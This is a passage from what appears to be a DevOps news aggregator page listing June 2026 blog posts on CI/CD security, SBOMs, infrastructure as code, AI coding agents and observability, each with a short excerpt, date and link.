        </h3><p>If you already run an OpenTelemetry pipeline, you have good visibility into what your applications are doing. This blog post is about what you don’t see yet: the east-west traffic between your service</p>
<p><strong>📅 Jun 29, 2026</strong> • <strong>📰 CNCF Blog</strong></p>
<p><a href="https://www.cncf.io/blog/2026/06/29/otel-and-mesh-derived-metrics-a-2026-reference/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-red-hat-openshift-delivers-high-performance-llm-inference-for-financial-services" class="group relative scroll-mt-24">
        <a href="#h3-red-hat-openshift-delivers-high-performance-llm-inference-for-financial-services" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Red Hat OpenShift delivers high-performance LLM inference for financial services
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-red-hat-openshift-delivers-high-performance-llm-inference-for-financial-services"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>The financial services industry, like many other sectors, is aiming to make best use of their hardware in the age of resource-intensive AI workloads. Financial services companies have come to rely on </p>
<p><strong>📅 Jun 26, 2026</strong> • <strong>📰 OpenShift Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/red-hat-openshift-delivers-high-performance-llm-inference-financial-services"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-how-to-generate-an-sbom-for-container-workflows" class="group relative scroll-mt-24">
        <a href="#h3-how-to-generate-an-sbom-for-container-workflows" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 How to Generate an SBOM for Container Workflows
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-how-to-generate-an-sbom-for-container-workflows"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Learn when, where, and how to generate SBOMs for container images. Covers build-time vs. post-build approaches, quality criteria, and CI/CD integration.</p>
<p><strong>📅 Jun 25, 2026</strong> • <strong>📰 Docker Blog</strong></p>
<p><a href="https://www.docker.com/blog/sbom-generation-for-container-workflows/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-eu-cyber-resilience-act-overview-requirements-and-timelines" class="group relative scroll-mt-24">
        <a href="#h3-eu-cyber-resilience-act-overview-requirements-and-timelines" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 EU Cyber Resilience Act: Overview, Requirements, and Timelines
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-eu-cyber-resilience-act-overview-requirements-and-timelines"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Learn what the EU Cyber Resilience Act requires, including SBOM mandates, vulnerability reporting, and compliance deadlines for container teams.</p>
<p><strong>📅 Jun 25, 2026</strong> • <strong>📰 Docker Blog</strong></p>
<p><a href="https://www.docker.com/blog/eu-cyber-resilience-act-overview/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-cicd" class="group relative scroll-mt-24">
        <a href="#h2-cicd" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          🔄 CI/CD
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-cicd"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><h3 id="h3-github-and-undp-team-up-to-advance-development-priorities-in-ghana-with-open-source" class="group relative scroll-mt-24">
        <a href="#h3-github-and-undp-team-up-to-advance-development-priorities-in-ghana-with-open-source" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 GitHub and UNDP team up to advance development priorities in Ghana with open source
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-github-and-undp-team-up-to-advance-development-priorities-in-ghana-with-open-source"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>GitHub joined the United Nations Development Programme in Ghana to explore how open source governance can support one of West Africa&#39;s most ambitious digital reform efforts. The post GitHub and UNDP t</p>
<p><strong>📅 Jun 26, 2026</strong> • <strong>📰 GitHub Blog</strong></p>
<p><a href="https://github.blog/open-source/social-impact/github-and-undp-team-up-to-advance-development-priorities-in-ghana-with-open-source/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-ai-coding-agents-are-pulling-ci-feedback-into-the-inner-loop" class="group relative scroll-mt-24">
        <a href="#h3-ai-coding-agents-are-pulling-ci-feedback-into-the-inner-loop" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 AI Coding Agents Are Pulling CI Feedback Into the Inner Loop
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-ai-coding-agents-are-pulling-ci-feedback-into-the-inner-loop"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>The traditional shape of CI/CD assumed humans worked in the inner loop and pipelines policed the outer one. AI coding agents are tearing that geometry apart. When code can be generated in seconds, wai</p>
<p><strong>📅 Jun 26, 2026</strong> • <strong>📰 DevOps.com</strong></p>
<p><a href="https://devops.com/ai-coding-agents-are-pulling-ci-feedback-into-the-inner-loop/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-transitioning-as-a-hubber" class="group relative scroll-mt-24">
        <a href="#h3-transitioning-as-a-hubber" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Transitioning as a Hubber
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-transitioning-as-a-hubber"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>How GitHub&#39;s culture and benefits helped me be the best version of myself. The post Transitioning as a Hubber appeared first on The GitHub Blog.</p>
<p><strong>📅 Jun 26, 2026</strong> • <strong>📰 GitHub Blog</strong></p>
<p><a href="https://github.blog/developer-skills/career-growth/transitioning-as-a-hubber/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-securing-cicd-for-an-open-source-project-part-3-credentials-verification-and-whats-next" class="group relative scroll-mt-24">
        <a href="#h3-securing-cicd-for-an-open-source-project-part-3-credentials-verification-and-whats-next" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Securing CI/CD for an open source project, part 3: Credentials, verification, and what’s next
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-securing-cicd-for-an-open-source-project-part-3-credentials-verification-and-whats-next"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>This is the third and final post in a series on how Cilium hardens its CI/CD pipeline. Part 1 covered access control and Part 2 covered dependency hardening. This post covers the last layer: keeping C</p>
<p><strong>📅 Jun 26, 2026</strong> • <strong>📰 CNCF Blog</strong></p>
<p><a href="https://www.cncf.io/blog/2026/06/26/securing-ci-cd-for-an-open-source-project-part-3-credentials-verification-and-whats-next/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-evaluating-performance-and-efficiency-of-the-github-copilot-agentic-harness-across-models-and-tasks" class="group relative scroll-mt-24">
        <a href="#h3-evaluating-performance-and-efficiency-of-the-github-copilot-agentic-harness-across-models-and-tasks" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Evaluating performance and efficiency of the GitHub Copilot agentic harness across models and tasks
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-evaluating-performance-and-efficiency-of-the-github-copilot-agentic-harness-across-models-and-tasks"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Explore how the GitHub Copilot agentic harness delivers strong results across multiple benchmarks and leading token efficiency, while maintaining flexibility to choose among more than 20 models. The p</p>
<p><strong>📅 Jun 25, 2026</strong> • <strong>📰 GitHub Blog</strong></p>
<p><a href="https://github.blog/ai-and-ml/github-copilot/evaluating-performance-and-efficiency-of-the-github-copilot-agentic-harness-across-models-and-tasks/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-warehouse-native-experimentation-comes-to-bigquery-databricks-and-redshift" class="group relative scroll-mt-24">
        <a href="#h3-warehouse-native-experimentation-comes-to-bigquery-databricks-and-redshift" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Warehouse-native experimentation comes to BigQuery, Databricks, and Redshift
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-warehouse-native-experimentation-comes-to-bigquery-databricks-and-redshift"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Analyze your experiments on the same trusted data your business already runs on, so results never come with an asterisk.</p>
<p><strong>📅 Jun 25, 2026</strong> • <strong>📰 LaunchDarkly Blog</strong></p>
<p><a href="https://launchdarkly.com/blog/warehouse-native-experimentation-comes-to-bigquery-databricks-and-redshift/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-google-antigravity-agents-get-full-context-with-gitlab-orbit" class="group relative scroll-mt-24">
        <a href="#h3-google-antigravity-agents-get-full-context-with-gitlab-orbit" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Google Antigravity agents get full context with GitLab Orbit
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-google-antigravity-agents-get-full-context-with-gitlab-orbit"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Developers working in Google Antigravity can now install our lifecycle context graph, GitLab Orbit, directly from the Antigravity MCP Store and give their agents structured access to projects, pipelin</p>
<p><strong>📅 Jun 25, 2026</strong> • <strong>📰 GitLab Blog</strong></p>
<p><a href="https://about.gitlab.com/blog/gitlab-orbit-and-google-antigravity/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-gitlab-patch-release-1911-1903-18116" class="group relative scroll-mt-24">
        <a href="#h3-gitlab-patch-release-1911-1903-18116" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 GitLab Patch Release: 19.1.1, 19.0.3, 18.11.6
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-gitlab-patch-release-1911-1903-18116"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p><strong>📅 Jun 24, 2026</strong> • <strong>📰 GitLab Blog</strong></p>
<p><a href="https://docs.gitlab.com/releases/patches/patch-release-gitlab-19-1-1-released/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-i-automated-my-job-and-it-made-me-a-better-leader" class="group relative scroll-mt-24">
        <a href="#h3-i-automated-my-job-and-it-made-me-a-better-leader" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 I automated my job (and it made me a better leader)
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-i-automated-my-job-and-it-made-me-a-better-leader"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Explore how my day as a senior leader looks now that I use 40 automations to help, and learn more about some of my favorites. The post I automated my job (and it made me a better leader) appeared firs</p>
<p><strong>📅 Jun 23, 2026</strong> • <strong>📰 GitHub Blog</strong></p>
<p><a href="https://github.blog/developer-skills/github/i-automated-my-job-and-it-made-me-a-better-leader/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-iac" class="group relative scroll-mt-24">
        <a href="#h2-iac" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          🏗️ IaC
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-iac"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><h3 id="h3-introducing-esc-secret-rotation-webhooks" class="group relative scroll-mt-24">
        <a href="#h3-introducing-esc-secret-rotation-webhooks" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Introducing ESC Secret Rotation Webhooks
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-introducing-esc-secret-rotation-webhooks"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Pulumi ESC centralizes your secrets and configuration, and it can automatically rotate secrets on a schedule so credentials never go stale. But a rotation is only useful if the systems that depend on </p>
<p><strong>📅 Jun 26, 2026</strong> • <strong>📰 Pulumi Blog</strong></p>
<p><a href="https://www.pulumi.com/blog/introducing-esc-secret-rotation-webhooks/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-govern-privileged-workload-boundaries-with-red-hat-openshift-ansible-automation-platform-and-identity-management" class="group relative scroll-mt-24">
        <a href="#h3-govern-privileged-workload-boundaries-with-red-hat-openshift-ansible-automation-platform-and-identity-management" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Govern privileged workload boundaries with Red Hat OpenShift, Ansible Automation Platform, and Identity Management
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-govern-privileged-workload-boundaries-with-red-hat-openshift-ansible-automation-platform-and-identity-management"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Platform engineering, security architecture, and operations teams are being asked to support 2 realities at once: modern application platforms such as Red Hat OpenShift, and long-lived Red Hat Enterpr</p>
<p><strong>📅 Jun 25, 2026</strong> • <strong>📰 OpenShift Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/govern-privileged-workload-boundaries-red-hat-openshift-ansible-automation-platform-and-identity-management"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-build-a-governed-databricks-workspace-with-pulumi" class="group relative scroll-mt-24">
        <a href="#h3-build-a-governed-databricks-workspace-with-pulumi" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Build a Governed Databricks Workspace with Pulumi
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-build-a-governed-databricks-workspace-with-pulumi"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Platform teams responsible for Databricks often find themselves manually configuring clusters and notebooks for every new data science team. This manual overhead leads to inconsistent cluster policies</p>
<p><strong>📅 Jun 25, 2026</strong> • <strong>📰 Pulumi Blog</strong></p>
<p><a href="https://www.pulumi.com/blog/end-to-end-databricks-with-pulumi/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-deploy-a-private-hermes-agent-on-render-securely-with-pulumi-modal-and-tailscale" class="group relative scroll-mt-24">
        <a href="#h3-deploy-a-private-hermes-agent-on-render-securely-with-pulumi-modal-and-tailscale" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Deploy a Private Hermes Agent on Render Securely with Pulumi, Modal, and Tailscale
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-deploy-a-private-hermes-agent-on-render-securely-with-pulumi-modal-and-tailscale"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Personal AI agents had their breakout this year. OpenClaw crossed 100,000 GitHub stars within months of launching, and self-hosting your own assistant went from a hobbyist trick to something a lot of </p>
<p><strong>📅 Jun 24, 2026</strong> • <strong>📰 Pulumi Blog</strong></p>
<p><a href="https://www.pulumi.com/blog/deploy-a-hermes-agent-with-pulumi/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-cloudflare-first-networking-as-code-with-pulumi" class="group relative scroll-mt-24">
        <a href="#h3-cloudflare-first-networking-as-code-with-pulumi" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Cloudflare-First Networking as Code with Pulumi
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-cloudflare-first-networking-as-code-with-pulumi"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Platform teams managing multi-cloud applications face a dangerous visibility gap. While origin infrastructure is tightly controlled, the edge configuration often drifts through manual console tweaks. </p>
<p><strong>📅 Jun 23, 2026</strong> • <strong>📰 Pulumi Blog</strong></p>
<p><a href="https://www.pulumi.com/blog/cloudflare-first-networking-with-pulumi/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-observability" class="group relative scroll-mt-24">
        <a href="#h2-observability" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📊 Observability
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-observability"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><h3 id="h3-from-query-to-action-introducing-sql-alerting-in-cloud-monitoring-observability-analytics" class="group relative scroll-mt-24">
        <a href="#h3-from-query-to-action-introducing-sql-alerting-in-cloud-monitoring-observability-analytics" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 From query to action: Introducing SQL alerting in Cloud Monitoring Observability Analytics
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-from-query-to-action-introducing-sql-alerting-in-cloud-monitoring-observability-analytics"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Traditional alerting systems often force a compromise: you can either alert immediately on simple, noisy log events, or monitor rigid, pre-configured metrics that fail when faced with data with many u</p>
<p><strong>📅 Jun 26, 2026</strong> • <strong>📰 Google Cloud Blog</strong></p>
<p><a href="https://cloud.google.com/blog/products/management-tools/alert-with-sql-in-cloud-monitoring-observability-analytics/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-top-sentry-alternatives-to-improve-error-management-and-system-insights" class="group relative scroll-mt-24">
